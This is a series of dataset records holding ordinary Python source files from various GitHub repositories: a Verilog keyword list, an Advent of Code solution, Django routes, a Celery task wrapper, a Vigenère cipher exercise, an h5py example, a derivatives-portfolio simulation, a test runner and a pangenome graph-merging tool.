'$ungetc',\n '$fscanf',\n '$fgets',\n '$fread',\n '$sscanf',\n '$fseek',\n '$rewind',\n '$fflush',\n '$ftell',\n '$feof ',\n '$ferror',\n # Memory load tasks (21.4)\n '$readmemb',\n '$readmemh',\n # Memory dump tasks (21.5)\n '$writememb',\n '$writememh',\n # Command line input (21.6)\n '$test',\n '$value',\n '$plusargs',\n # VCD tasks (21.7)\n '$dumpfile',\n '$dumpvars',\n '$dumpoff',\n '$dumpon',\n '$dumpall',\n '$dumplimit',\n '$dumpflush',\n '$dumpports',\n '$dumpportsoff',\n '$dumpportson',\n '$dumpportsall',\n '$dumpportslimit',\n '$dumpportsflush',\n \n]","repo_name":"Nic30/hdlConvertorAst","sub_path":"hdlConvertorAst/to/verilog/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"21201908776","text":"#!/usr/bin/python3\n\nimport math\nimport copy\n\ndef read_input(input_file):\n with open(input_file, 'r') as input_file:\n data = input_file.read()[:-1]\n data = data.split('\\n')\n return data\n\ndef rotate_quick(wayp_pos, deg, dir=1):\n for i in range(abs(deg)//90):\n wayp_pos = [-dir*wayp_pos[1], dir*wayp_pos[0]]\n return wayp_pos\n\ndef part1(data = False):\n if not data:\n data = read_input('input')\n pos = [0,0]\n dir = 0\n for instr in data:\n param = int(instr[1:])\n if instr[0] in ['L','R']:\n if instr[0] == 'L':\n dir += param\n else:\n dir -= param\n dir = dir % 360\n elif instr[0] in ['N','S','E','W']:\n if instr[0] == 'N':\n pos[1] += param\n elif instr[0] == 'S':\n pos[1] -= param\n elif instr[0] == 'E':\n pos[0] += param\n elif instr[0] == 'W':\n pos[0] -= param\n elif instr[0] in ['F']:\n if dir == 0:\n pos[0] += param\n elif dir == 180:\n pos[0] -= param\n elif dir == 90:\n pos[1] += param\n elif dir == 270:\n pos[1] -= param\n else:\n print('Error: unknown direction', dir)\n exit()\n else:\n print('Error: unknown instruction', instr)\n exit()\n return abs(pos[0])+abs(pos[1])\n\ndef part2(data = False):\n if not data:\n data = read_input('input')\n ship_pos = [0,0]\n wayp_pos = [10,1]\n for instr in data:\n param = int(instr[1:])\n if instr[0] in ['L','R']:\n wp = wayp_pos.copy()\n if instr[0] == 'L':\n wayp_pos = rotate_quick(wp, param)\n else:\n wayp_pos = rotate_quick(wp, param, -1)\n elif instr[0] in ['N','S','E','W']:\n if instr[0] == 'N':\n wayp_pos[1] += param\n elif instr[0] == 'S':\n wayp_pos[1] -= param\n elif instr[0] == 'E':\n wayp_pos[0] += param\n 
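# --- Illustrative sanity check (not from the repo). Two pitfalls visible in the
# symbol list above: Python concatenates adjacent string literals, so the missing
# comma after '$increment' silently fuses it with '$size' into '$increment$size';
# and several entries ('$writeh ', '$monitor ', '$sformatf ', '$feof ', ...) carry
# trailing spaces. (Also, per IEEE 1800 section 21.6, the plusargs functions are
# the single tokens '$test$plusargs' and '$value$plusargs', not three entries.)
def audit_symbols(symbols):
    # heuristic: $async$.../$sync$... PLA tasks legitimately embed extra '$'
    fused = [s for s in symbols
             if s.count('$') > 1 and not s.startswith(('$async', '$sync'))]
    padded = [s for s in symbols if s != s.strip()]
    return fused, padded

fused, padded = audit_symbols(['$increment' '$size', '$writeh ', '$clog2'])
assert fused == ['$increment$size'] and padded == ['$writeh ']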
elif instr[0] == 'W':\n wayp_pos[0] -= param\n elif instr[0] in ['F']:\n ship_pos[0] += wayp_pos[0] * param\n ship_pos[1] += wayp_pos[1] * param\n else:\n print('Error: unknown instruction', instr)\n exit()\n return abs(ship_pos[0])+abs(ship_pos[1])\n\n\ndef unit_test_p1():\n data = read_input('test_input')\n print(\"Unit test start:\")\n assert part1(data) == 25\n print(\"Test 1 OK\")\n\ndef unit_test_p2():\n data = read_input('test_input')\n print(\"Unit test start:\")\n assert part2(data) == 286\n print(\"Test 1 OK\")\n\nprint(\"** Part one\")\nunit_test_p1()\nprint(\"My solution is: \", part1(), \"\\n\")\n\nprint(\"** Part two\")\nunit_test_p2()\nprint(\"My solution is:\", part2(), \"\\n\")\ndata = read_input('input')\n","repo_name":"tomluvoe/adventofcode2020","sub_path":"day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919195367","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom c_index.views import *\nfrom . import views\n\nurlpatterns = [\n url(r'^index/$',views.index),\n url(r'^list/(?P\\d*)$',views.list_category),\n url(r'^list/(?P[0-9]+)/$',views.list_category),\n url(r'^user_center_info/$',views.user_center_info),\n url(r'^user_center_info_handle/$',views.user_center_info_handle),\n url(r'^user_changepwd/$',views.user_changepwd),\n url(r'^changepwd_handle/',views.changepwd_handle),\n url(r'^logout/$',views.logout),\n url(r'^detail/(?P[0-9a-zA-Z\\-]+)/$',views.goodinfo),\n url(r'^search/', MySearchView()),\n]","repo_name":"Justinzhao666/OrderManagementSystem","sub_path":"c_index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31077549756","text":"import copy\nimport logging\nimport os\n\nfrom celery import Celery\n# noinspection PyProtectedMember\nfrom celery import Task\n\nfrom django.conf import settings\n\nfrom fleio.activitylog.utils.functions import current_activity_id\nfrom fleio.activitylog.utils.functions import end_current_activity\nfrom fleio.activitylog.utils.functions import set_current_activity_if_none\n\nfrom fleio.base_settings import TASK_LOG_DIR\n\nCURRENT_TASK_ID = None\nLOG = logging.getLogger(__name__)\nENABLE_TASK_LOGGING = True\n\n\nclass FleioTask(Task):\n abstract = True\n\n def __init__(self):\n self.typing = False\n\n def run(self, *args, **kwargs):\n pass\n\n def delay(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().delay(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def si(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().si(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def s(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().s(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def __call__(self, *args, **kwargs):\n if not self.request.id:\n # we do not have task id, this happens when task is invoked directly\n # we do not log anything here at the moment since this is just a normal function call\n return super().__call__(*args, **kwargs)\n\n global CURRENT_TASK_ID\n old_task_id = CURRENT_TASK_ID\n CURRENT_TASK_ID = self.request.id\n\n task_kwargs = copy.deepcopy(kwargs)\n\n if 'parent_task_id' in task_kwargs:\n self.parent_task_id = 
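# --- Quick property check (illustrative, not from the repo): rotate_quick's
# 90-degree step [x, y] -> [-y, x] is multiplication by i in the complex plane
# (dir=1, counter-clockwise for 'L'); dir=-1 corresponds to multiplying by -i.
def _rotate_quick(wayp_pos, deg, dir=1):
    for _ in range(abs(deg) // 90):
        wayp_pos = [-dir * wayp_pos[1], dir * wayp_pos[0]]
    return wayp_pos

for deg in (90, 180, 270):
    z = complex(10, 4) * (1j ** (deg // 90))
    assert _rotate_quick([10, 4], deg) == [int(z.real), int(z.imag)]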
task_kwargs.pop('parent_task_id')\n else:\n LOG.error('Parent task id is not present in task parameters !!!')\n\n must_end_activity = False\n if 'activity_log_id' in task_kwargs:\n self.activity_log_id = task_kwargs.pop('activity_log_id')\n must_end_activity = set_current_activity_if_none(activity_id=self.activity_log_id)\n\n if ENABLE_TASK_LOGGING:\n # set custom log handler to capture task logs\n formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\n task_handler = logging.FileHandler(os.path.join(settings.TASK_LOG_DIR, CURRENT_TASK_ID + '.log'))\n task_handler.setFormatter(formatter)\n task_handler.setLevel(logging.DEBUG)\n logging.root.addHandler(task_handler)\n\n try:\n # actual task execution\n task_result = super().__call__(*args, **task_kwargs)\n finally:\n if ENABLE_TASK_LOGGING:\n # remove log handler\n # noinspection PyUnboundLocalVariable\n logging.root.removeHandler(task_handler)\n task_handler.flush()\n task_handler.close()\n\n if must_end_activity:\n end_current_activity(activity_id=self.activity_log_id)\n\n CURRENT_TASK_ID = old_task_id\n\n return task_result\n\n\nclass FleioCelery(Celery):\n task_cls = FleioTask\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'fleio.settings')\n\ntry:\n if not os.path.isdir(TASK_LOG_DIR):\n parent_dir = os.path.dirname(TASK_LOG_DIR)\n parent_stat = os.stat(parent_dir)\n\n os.mkdir(TASK_LOG_DIR, 0o755)\n stats = os.stat(TASK_LOG_DIR)\n if stats.st_uid != parent_stat.st_uid:\n os.chown(TASK_LOG_DIR, parent_stat.st_uid, parent_stat.st_gid)\nexcept Exception as e:\n del e # unused\n LOG.exception('Failed to create tasklog directory, disabling task logging')\n ENABLE_TASK_LOGGING = False\n\n\napp = FleioCelery('fleio')\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request)) # noqa\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40982003367","text":"def encript(plainText,key):\n encryption=\"\"\n s=0\n for i in range(0,len(plainText)):\n encryption+=chr((((ord(plainText[i])-65) + (ord(key[s])-65))%26)+65)\n s=(s+1)%len(key)\n\n return encryption\n\ndef decrypher(cipherText,key):\n decryption=\"\"\n s=0\n for i in range(0,len(cipherText)):\n decryption+=chr((((ord(cipherText[i])-65) - (ord(key[s])-65)+26)%26)+65)\n s=(s+1)%len(key)\n\n return decryption\n\n\nprint(\"\\n Vigere Cipher\\n\")\nprint()\nbegin=1\nwhile(begin==1):\n print(\" Options: \\n 0. To close the program.\\n 1. To encrypt\\n 2. 
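# --- Minimal stdlib sketch (assumes only a writable temp dir) of the
# attach-run-detach pattern FleioTask.__call__ uses for per-task log capture;
# run_with_task_log and 'demo-task' are hypothetical names for illustration.
import logging, os, tempfile

def run_with_task_log(task_id, fn):
    handler = logging.FileHandler(os.path.join(tempfile.gettempdir(), task_id + '.log'))
    handler.setFormatter(logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s'))
    handler.setLevel(logging.DEBUG)
    logging.root.addHandler(handler)
    try:
        return fn()
    finally:
        # remove first, then flush/close, mirroring the finally block above
        logging.root.removeHandler(handler)
        handler.flush()
        handler.close()

run_with_task_log('demo-task', lambda: logging.warning('captured per task'))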
To decrypt\\n Enter value: \", end=\"\")\n    instruction=input()\n    if(instruction=='1'):\n        print(\" Enter the key word in CAPITAL LETTER: \", end=\"\")\n        key=input()\n        print(\" Enter the phrase to encrypt in CAPITAL LETTER: \", end=\"\")\n        plainText=input()\n        print(\" Your Encryption was: \",encript(plainText,key))\n    else:\n        if(instruction=='2'):\n            print(\" Enter the key word in CAPITAL LETTER: \", end=\"\")\n            key=input()\n            print(\" Enter the phrase to decrypt in CAPITAL LETTER: \", end=\"\")\n            encryptText=input()\n            print(\" Your Decryption was: \",decrypher(encryptText,key))\n        else: begin=0\n    print(\"\\n Press enter to continue...\")\n    input()\n\n\n#cipherText=encript(\"ESTAESUNACARTAPARATODALAGENTEQUEMEQUIERESEPUTOESTO\",\"RELATIONS\")\n#plainText=decrypher(cipherText,\"RELATIONS\")\n#print(cipherText)\n#print(plainText)","repo_name":"adchavesm/Cryptography","sub_path":"VigereCypher.py","file_name":"VigereCypher.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37358428108","text":"import h5py\nimport numpy as np\n\n# initialize file\nf = h5py.File(output_folder + \"mytestfile.hdf5\", \"w\") # 'w' is write mode\n# store data in the file\nf.create_dataset(\"data_name\", data=data_np_array)\nf.close()\n\n# read file\nf = h5py.File(output_folder + \"mytestfile.hdf5\", 'r') # 'r' means that hdf5 file is open in read-only mode\ndat = f[\"data_name\"][:] # reads data as np ndarray\nf.close()","repo_name":"wuxiaotiankevin/DataScienceToolbox","sub_path":"between_python_R/read_write_hdf5.py","file_name":"read_write_hdf5.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"31313831397","text":"import sys, pdb\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nfrom dx import *\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/dx/'\n\ndef derivatives_sim():\n    me_gbm = market_environment('me_gbm', dt.datetime(2015, 1, 1))\n    me_gbm.add_constant('initial_value', 36.)\n    me_gbm.add_constant('volatility', 0.2)\n    me_gbm.add_constant('currency', 'EUR')\n    me_gbm.add_constant('model', 'gbm')\n    me_am_put = market_environment('me_am_put', dt.datetime(2015, 1, 1))\n    me_am_put.add_constant('maturity', dt.datetime(2015, 12, 31))\n    me_am_put.add_constant('strike', 40.)\n    me_am_put.add_constant('currency', 'EUR')\n    payoff_func = 'np.maximum(strike - instrument_values, 0)'\n    am_put_pos = derivatives_position(\n        name='am_put_pos',\n        quantity=3,\n        underlyings=['gbm'],\n        mar_env=me_am_put,\n        otype='American single',\n        payoff_func=payoff_func)\n    am_put_pos.get_info()\n    me_jd = market_environment('me_jd', me_gbm.pricing_date)\n    \n    # add jump diffusion specific parameters\n    me_jd.add_constant('lambda', 0.3)\n    me_jd.add_constant('mu', -0.75)\n    me_jd.add_constant('delta', 0.1)\n    \n    # add other parameters from gbm\n    me_jd.add_environment(me_gbm)\n\n    # needed for portfolio valuation\n    me_jd.add_constant('model', 'jd')\n    me_eur_call = market_environment('me_eur_call', me_jd.pricing_date)\n    me_eur_call.add_constant('maturity', dt.datetime(2015, 6, 30))\n    me_eur_call.add_constant('strike', 38.)\n    me_eur_call.add_constant('currency', 'EUR')\n    payoff_func = 'np.maximum(maturity_value - strike, 
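# --- Illustrative round-trip property check (not in the repo): for uppercase
# A-Z input, decrypher(encript(p, k), k) must give back p. The two helpers
# below are compact re-statements of the cipher functions above.
import random, string

def _encript(plainText, key):
    return ''.join(chr((ord(p) + ord(key[i % len(key)]) - 130) % 26 + 65)
                   for i, p in enumerate(plainText))

def _decrypher(cipherText, key):
    return ''.join(chr((ord(c) - ord(key[i % len(key)]) + 26) % 26 + 65)
                   for i, c in enumerate(cipherText))

for _ in range(100):
    p = ''.join(random.choices(string.ascii_uppercase, k=20))
    k = ''.join(random.choices(string.ascii_uppercase, k=5))
    assert _decrypher(_encript(p, k), k) == p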
0)'\n eur_call_pos = derivatives_position(\n name='eur_call_pos',\n quantity=5,\n underlyings=['jd'],\n mar_env=me_eur_call,\n otype='European single',\n payoff_func=payoff_func)\n underlyings = {'gbm': me_gbm, 'jd' : me_jd}\n positions = {'am_put_pos' : am_put_pos, 'eur_call_pos' : eur_call_pos}\n\n # discounting object for the valuation\n csr = constant_short_rate('csr', 0.06)\n val_env = market_environment('general', me_gbm.pricing_date)\n val_env.add_constant('frequency', 'W')\n \n # monthly frequency\n val_env.add_constant('paths', 2500)\n val_env.add_constant('starting_date', val_env.pricing_date)\n val_env.add_constant('final_date', val_env.pricing_date)\n \n # not yet known; take pricing_date temporarily\n val_env.add_curve('discount_curve', csr)\n # select single discount_curve for whole portfolio\n pdb.set_trace()\n portfolio = derivatives_portfolio(\n name='portfolio',\n positions=positions,\n val_env=val_env,\n risk_factors=underlyings,\n fixed_seed=False)\n portfolio.get_statistics(fixed_seed=False)\n portfolio.get_statistics(fixed_seed=False)[['pos_value', 'pos_delta', 'pos_vega']].sum()\n \n # aggregate over all positions\n # portfolio.get_positions()\n \n print(portfolio.valuation_objects['am_put_pos'].present_value())\n print(portfolio.valuation_objects['eur_call_pos'].delta())\n path_no = 777\n path_gbm = portfolio.underlying_objects['gbm'].get_instrument_values()[:, path_no]\n path_jd = portfolio.underlying_objects['jd'].get_instrument_values()[:, path_no]\n\n plt.figure(figsize=(7, 4))\n plt.plot(portfolio.time_grid, path_gbm, 'r', label='gbm')\n plt.plot(portfolio.time_grid, path_jd, 'b', label='jd')\n plt.xticks(rotation=30)\n plt.legend(loc=0); plt.grid(True)\n plt.savefig(PATH + 'dx_port.png', dpi=300)\n plt.close()\n\n correlations = [['gbm', 'jd', 0.9]]\n port_corr = derivatives_portfolio(\n name='portfolio',\n positions=positions,\n val_env=val_env,\n risk_factors=underlyings,\n correlations=correlations,\n fixed_seed=True)\n print(port_corr.get_statistics())\n path_gbm = port_corr.underlying_objects['gbm'].\\\n get_instrument_values()[:, path_no]\n path_jd = port_corr.underlying_objects['jd'].\\\n get_instrument_values()[:, path_no]\n\n plt.figure(figsize=(7, 4))\n plt.plot(portfolio.time_grid, path_gbm, 'r', label='gbm')\n plt.plot(portfolio.time_grid, path_jd, 'b', label='jd')\n plt.xticks(rotation=30)\n plt.legend(loc=0); plt.grid(True)\n plt.savefig(PATH + 'dx_port2.png', dpi=300)\n plt.close()\n\n pv1 = 5 * port_corr.valuation_objects['eur_call_pos'].\\\n present_value(full=True)[1]\n print(pv1)\n pv2 = 3 * port_corr.valuation_objects['am_put_pos'].\\\n present_value(full=True)[1]\n print(pv2)\n plt.hist([pv1, pv2], bins=25,\n label=['European call', 'American put']);\n plt.axvline(pv1.mean(), color='r', ls='dashed',\n lw=1.5, label='call mean = %4.2f' % pv1.mean())\n plt.axvline(pv2.mean(), color='r', ls='dotted',\n lw=1.5, label='put mean = %4.2f' % pv2.mean())\n plt.xlim(0, 80); plt.ylim(0, 10000)\n plt.legend()\n plt.savefig(PATH + 'dx_port3.png', dpi=300)\n plt.close()\n\n pvs = pv1 + pv2\n plt.hist(pvs, bins=50, label='portfolio');\n plt.axvline(pvs.mean(), color='r', ls='dashed',\n lw=1.5, label='mean = %4.2f' % pvs.mean())\n plt.xlim(0, 80); plt.ylim(0, 7000)\n plt.legend()\n plt.savefig(PATH + 'dx_port4.png', dpi=300)\n plt.close()\n\n # portfolio with correlation\n print(pvs.std())\n # portfolio without correlation\n pv1 = 5 * portfolio.valuation_objects['eur_call_pos'].\\\n present_value(full=True)[1]\n pv2 = 3 * 
portfolio.valuation_objects['am_put_pos'].\\\n present_value(full=True)[1]\n print((pv1 + pv2).std())\n\nif __name__ == '__main__': \n derivatives_sim()","repo_name":"mccarvik/python_for_finance","sub_path":"books/python_for_finance_book/ch_scraps/18ch_scrap.py","file_name":"18ch_scrap.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34179991362","text":"#!/usr/bin/env python\n# Don't run tests from the root repo dir.\n# We want to ensure we're importing from the installed\n# binary package not from the CWD.\n\nimport os\nfrom subprocess import check_call\n\n_dname = os.path.dirname\n\nREPO_ROOT = _dname(_dname(os.path.abspath(__file__)))\nos.chdir(os.path.join(REPO_ROOT))\n\ntcmn = 'py.test tests --cov=pubnub --ignore=tests/manual/'\nfcmn = 'flake8 --exclude=scripts/,src/,.cache,.git,.idea,.tox,._trial_temp/,venv/ --ignore F811,E402'\n\n\ndef run(command):\n return check_call(command, shell=True)\n\n\nrun(tcmn)\n# moved to separate action\n# run(fcmn)\n","repo_name":"pubnub/python","sub_path":"scripts/run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"53"} +{"seq_id":"5982351499","text":"#!/usr/bin/env python3\n\"\"\"\nA script to merge a single GFF file with a pre-existing panaroo output\n\"\"\"\n\nimport os\nimport tempfile\nimport networkx as nx\nimport shutil\nimport sys\nimport subprocess\n\nfrom .__init__ import __version__\nfrom .prokka import process_prokka_input\nfrom .cdhit import run_cdhit\nfrom .generate_network import generate_network\nfrom .isvalid import *\nfrom .merge_graphs import merge_graphs\n\n\ndef get_options(\n): #options for integrating (combination of merge graph and cdhit options\n\n import argparse\n\n description = 'Integrate new gff file into pre-existing graph'\n parser = argparse.ArgumentParser(description=description,\n prog='panaroo_integrate')\n\n io_opts = parser.add_argument_group('Input/output')\n\n io_opts.add_argument(\n \"-d\",\n \"--input_dir\",\n dest=\"input_dir\",\n required=True,\n help=\"input directory for gml of pre-existing panaroo output\",\n type=str)\n\n io_opts.add_argument(\"-i\",\n \"--input_gff\",\n dest=\"input_gff\",\n required=True,\n help=\"input gff file of new genome to be integrated\",\n type=str)\n\n io_opts.add_argument(\"-o\",\n \"--out_dir\",\n dest=\"output_dir\",\n required=True,\n help=\"location of a new output directory\",\n type=str)\n \n io_opts.add_argument(\n \"--remove-invalid-genes\",\n dest=\"filter_invalid\",\n action='store_true',\n default=False,\n help=(\n \"removes annotations that do not conform to the expected Prokka\" +\n \" format such as those including premature stop codons.\"))\n\n matching = parser.add_argument_group('Matching')\n\n matching.add_argument(\"-c\",\n \"--threshold\",\n dest=\"id\",\n help=\"sequence identity threshold (default=0.95)\",\n default=0.98,\n type=float)\n\n matching.add_argument(\n \"-f\",\n \"--family_threshold\",\n dest=\"family_threshold\",\n help=\"protein family sequence identity threshold (default=0.7)\",\n default=0.7,\n type=float)\n\n matching.add_argument(\"--len_dif_percent\",\n dest=\"len_dif_percent\",\n help=\"length difference cutoff (default=0.95)\",\n default=0.95,\n type=float)\n\n matching.add_argument(\"--merge_paralogs\",\n dest=\"merge_paralogs\",\n help=\"don't split paralogs\",\n action='store_true',\n default=False)\n\n 
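# --- Back-of-envelope numpy sketch (illustrative numbers, no dx dependency) of
# the comparison made above: Var(A + B) = Var(A) + Var(B) + 2*Cov(A, B), so the
# rho = 0.9 correlation between the two position values inflates the summed
# portfolio's standard deviation relative to the uncorrelated case.
import numpy as np

rng = np.random.default_rng(0)
for rho in (0.9, 0.0):
    cov = [[1.0, rho], [rho, 1.0]]
    pv1, pv2 = rng.multivariate_normal([0.0, 0.0], cov, size=100_000).T
    print(rho, round((pv1 + pv2).std(), 3))  # ~1.949 for rho=0.9 vs ~1.414 for rho=0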
matching.add_argument(\n \"--length_outlier_support_proportion\",\n dest=\"length_outlier_support_proportion\",\n help=\n (\"proportion of genomes supporting a gene with a length more \" +\n \"than 1.5x outside the interquatile range for genes in the same cluster\"\n +\n \" (default=0.01). Genes failing this test will be re-annotated at the \"\n + \"shorter length\"),\n type=float,\n default=0.1)\n\n parser.add_argument(\n \"--min_edge_support_sv\",\n dest=\"min_edge_support_sv\",\n help=(\n \"minimum edge support required to call structural variants\" +\n \" in the presence/absence csv file (default=max(2, 0.01*n_samples))\"\n ),\n default=2,\n type=int)\n\n # MSA options\n core = parser.add_argument_group('Gene alignment')\n core.add_argument(\n \"-a\",\n \"--alignment\",\n dest=\"aln\",\n help=(\"Output alignments of core genes or all genes. Options are\" +\n \" 'core' and 'pan'. Default: 'None'\"),\n type=str,\n choices=['core', 'pan'],\n default=None)\n\n core.add_argument(\n \"--aligner\",\n dest=\"alr\",\n help=\n \"Specify an aligner. Options:'prank', 'clustal', and default: 'mafft'\",\n type=str,\n choices=['prank', 'clustal', 'mafft'],\n default=\"mafft\")\n\n core.add_argument(\"--core_threshold\",\n dest=\"core\",\n help=\"Core-genome sample threshold (default=0.95)\",\n type=float,\n default=0.95)\n\n core.add_argument(\"--core_entropy_filter\",\n dest=\"hc_threshold\",\n help=(\"Manually set the Block Mapping and Gathering with \" +\n \"Entropy (BMGE) filter. Can be between 0.0 and 1.0. By \" + \n \"default this is set using the Tukey outlier method.\"),\n type=float,\n default=None)\n\n graph = parser.add_argument_group('Graph correction')\n\n graph.add_argument(\n \"--all_seq_in_graph\",\n dest=\"all_seq_in_graph\",\n help=(\"Retains all DNA sequence for each gene cluster in the graph \" +\n \"output. Off by default as it uses a large amount of space.\"),\n action='store_true',\n default=False)\n\n # Other options\n parser.add_argument(\"-t\",\n \"--threads\",\n dest=\"n_cpu\",\n help=\"number of threads to use (default=1)\",\n type=int,\n default=1)\n parser.add_argument(\"--codon-table\",\n dest=\"table\",\n help=\"the codon table to use for translation (default=11)\",\n type=int,\n default=11)\n parser.add_argument(\"--quiet\",\n dest=\"quiet\",\n help=\"suppress additional output\",\n action='store_true',\n default=False)\n\n parser.add_argument(\n \"--dirty\",\n dest=\"dirty\",\n help=\n \"keep temporary directory containing cluster files and cdhit output\",\n action='store_true',\n default=False)\n\n parser.add_argument(\"--version'\",\n action=\"version\",\n version='%(prog)s ' + __version__)\n\n args = parser.parse_args()\n\n return (args)\n\n\ndef replace_all(text, dic):\n for i, j in dic.items():\n text = text.replace(i, j)\n return text\n\n\ndef reformat_network(single_gml, output_dir, isolateName):\n \"\"\"Reformats the output of generate_network() for linear graphs to allow input into merge_graphs()\"\"\"\n for adj in single_gml._adj:\n for x in single_gml._adj[adj]:\n y = single_gml._adj[adj][x]\n\n y.pop('members')\n zero = {'members': 0}\n y.update(zero)\n\n genomes = {'genomeIDs': '0'}\n y.update(genomes)\n\n for node in single_gml._node:\n y = single_gml._node[node]\n y.pop('members')\n\n zero = {\n 'members': 0\n } #members are assigned intbitset[0]. 
needs to be 0\n y.update(zero)\n\n to_replace = {\"[\": \"\", \"]\": \"\", \"'\": \"\"}\n y['centroid'] = replace_all(str(y['centroid']), to_replace)\n y['dna'] = replace_all(str(y['dna']), to_replace)\n y['protein'] = replace_all(str(y['protein']), to_replace)\n\n y['hasEnd'] = int(y['hasEnd'])\n y['mergedDNA'] = int(y['mergedDNA'])\n y['paralog'] = int(y['paralog'])\n\n y['longCentroidID'] = list(y['longCentroidID'])\n y['seqIDs'] = list(y['seqIDs'])\n\n single_gml.graph.update({'isolateNames':\n 'x'}) # isolateName from gff filename\n nx.write_gml(single_gml, output_dir + \"final_graph.gml\")\n\n return single_gml\n\n\ndef main():\n #Takes a single GFF input, generates a graph and merges with a pre-existing graph\n args = get_options()\n\n # create directory if it isn't present already\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n\n args.input_dir = os.path.join(args.input_dir, \"\")\n args.output_dir = os.path.join(args.output_dir, \"\")\n\n # Create temporary directory\n temp_dir = os.path.join(tempfile.mkdtemp(dir=args.output_dir), \"\")\n\n directories = [args.input_dir, temp_dir]\n\n gff_file = [args.input_gff]\n\n filename = os.path.basename(args.input_gff).split(\".\")[0]\n\n if not args.quiet: print(\"Processing input\")\n process_prokka_input(gff_list=gff_file,\n output_dir=temp_dir,\n filter_seqs=args.filter_invalid,\n quiet=args.quiet,\n n_cpu=args.n_cpu,\n table=args.table)\n\n cd_hit_out = temp_dir + \"combined_protein_cdhit_out.txt\"\n\n run_cdhit(input_file=temp_dir + \"combined_protein_CDS.fasta\",\n output_file=cd_hit_out,\n id=args.id,\n quiet=args.quiet,\n n_cpu=args.n_cpu)\n\n if not args.quiet: print(\"Generating network\")\n single_gml, centroid_contexts_single, seqid_to_centroid_single = generate_network(\n cluster_file=cd_hit_out + \".clstr\",\n data_file=temp_dir + \"gene_data.csv\",\n prot_seq_file=temp_dir + \"combined_protein_CDS.fasta\",\n all_dna=args.all_seq_in_graph)\n\n if not args.quiet: print(\"Reformatting network\")\n reformat_network(single_gml=single_gml,\n output_dir=temp_dir,\n isolateName=filename)\n\n merge_graphs(directories=directories,\n temp_dir=temp_dir,\n len_dif_percent=args.len_dif_percent,\n pid=args.id,\n family_threshold=args.family_threshold,\n length_outlier_support_proportion=args.\n length_outlier_support_proportion,\n merge_para=args.merge_paralogs,\n output_dir=args.output_dir,\n min_edge_support_sv=args.min_edge_support_sv,\n aln=args.aln,\n alr=args.alr,\n core=args.core,\n hc_threshold=args.hc_threshold,\n merge_single=True,\n depths=[1],\n n_cpu=args.n_cpu,\n quiet=args.quiet)\n\n G = nx.read_gml(args.output_dir + \"final_graph.gml\")\n\n for index, name in enumerate(\n G.graph['isolateNames']\n ): #Corrects isolate name for single gff being returned as list\n if name == 'x':\n G.graph['isolateNames'][index] = filename\n\n nx.write_gml(G, args.output_dir + \"final_graph.gml\")\n\n #remove temporary directory if dirty = True\n if not args.dirty:\n shutil.rmtree(temp_dir)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gtonkinhill/panaroo","sub_path":"panaroo/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"53"} +{"seq_id":"27991823968","text":"'''\nCreated on Mar 20, 2015\n\n@author: Marc Lopez (marc.rainier.lopez@gmail.com)\n'''\n\nfrom pytest import raises # @UnresolvedImport\nfrom mock import ANY\n\nfrom .mocks import ProcessUtilityMock\n\nfrom 
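# --- Small illustration (hypothetical two-node graph, networkx only) of why
# reformat_network above coerces attributes: write_gml cannot serialize sets
# or intbitsets, so they must become ints/strings/lists first.
import io
import networkx as nx

g = nx.Graph()
g.add_node('geneA', members={0, 1})  # a set is not a valid GML value
try:
    nx.write_gml(g, io.BytesIO())
except Exception:
    g.nodes['geneA']['members'] = sorted(g.nodes['geneA']['members'])
    nx.write_gml(g, io.BytesIO())  # fine once the set is coerced to a list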
